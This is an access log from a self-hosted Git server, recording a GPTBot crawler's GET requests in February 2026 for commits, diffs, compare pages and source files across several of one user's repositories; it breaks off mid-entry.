"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" -[17/Feb/2026:13:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" -[17/Feb/2026:13:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 18057] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 19863] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15481] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15480] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 174831] [Gzip 16.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=40" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:13:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" -[17/Feb/2026:13:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=512" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:13:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:13:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=96" [Client 74.7.227.38] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/watchers" -[17/Feb/2026:13:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 150413] [Gzip 17.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 150372] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:28:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" -[17/Feb/2026:13:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 74.7.227.38] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 74.7.227.38] [Length 16073] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 74.7.227.38] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 74.7.227.38] [Length 16074] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 74.7.227.38] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=activity" [Client 74.7.227.38] [Length 10037] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:13:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10279] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" [Client 74.7.227.38] [Length 13920] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:28:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/" [Client 74.7.227.38] [Length 46] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 74.7.227.38] [Length 17170] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/" -[17/Feb/2026:13:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23927] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:13:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13903] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:13:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" -[17/Feb/2026:13:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" -[17/Feb/2026:13:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" -[17/Feb/2026:13:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 74.7.227.38] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" -[17/Feb/2026:13:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" -[17/Feb/2026:13:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 387798] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:13:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 74.7.227.38] [Length 17005] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:13:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" -[17/Feb/2026:13:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 74.7.227.38] [Length 211400] [Gzip 13.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:13:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71402] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" -[17/Feb/2026:13:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" [Client 74.7.227.38] [Length 13787] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" -[17/Feb/2026:13:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15175] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16092] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" -[17/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 74.7.227.38] [Length 190761] [Gzip 12.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:13:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10850] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 388225] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 387845] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 388226] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 387813] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 8442] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17046] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 211417] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:13:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" [Client 74.7.227.38] [Length 558422] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 8481] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 190231] [Gzip 12.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 190693] [Gzip 12.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 442155] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 441729] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 